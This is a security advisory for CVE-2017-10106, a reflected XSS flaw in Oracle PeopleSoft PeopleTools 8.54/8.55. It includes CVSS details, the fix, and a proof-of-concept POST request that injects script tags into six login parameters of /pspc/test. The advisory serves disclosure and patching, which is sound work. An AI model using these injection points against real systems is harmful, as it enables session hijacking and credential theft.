Application: Oracle PeopleSoft **Versions Affected:**PeopleTools 8.54, 8.55 Vendor:Oracle **Bugs:**XSS **Reported:**26.01.2017 **Vendor response:**27.01.2017 **Date of Public Advisory:**18.07.2017 **Reference: **Oracle CPU July 2017 Authors: Dmitri Iudin aka @ret5et (ERPScan)
Class: XSS [CWE-79]
Risk: Medium
Impact: Modify displayed content from a Web site, steal authentication information of a user
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10106
CVSS Base Score v3: 6.1 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | Required ® |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed © |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | None (N) |
An attacker can use a special HTTP request to hijack session data of administrators or users of the web resource.
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
To correct this vulnerability, implement Oracle CPU July 2017
POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>&command=login HTTP/1.1 Host: 172.16.2.230:8000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 twitter:@ret5et Accept-Encoding: gzip, deflate Content-Length: 0
1
2
3
4
5
|
POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>&command=login HTTP/1.1
Host: 172.16.2.230:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 twitter:@ret5et
Accept-Encoding: gzip, deflate
Content-Length: 0
—|—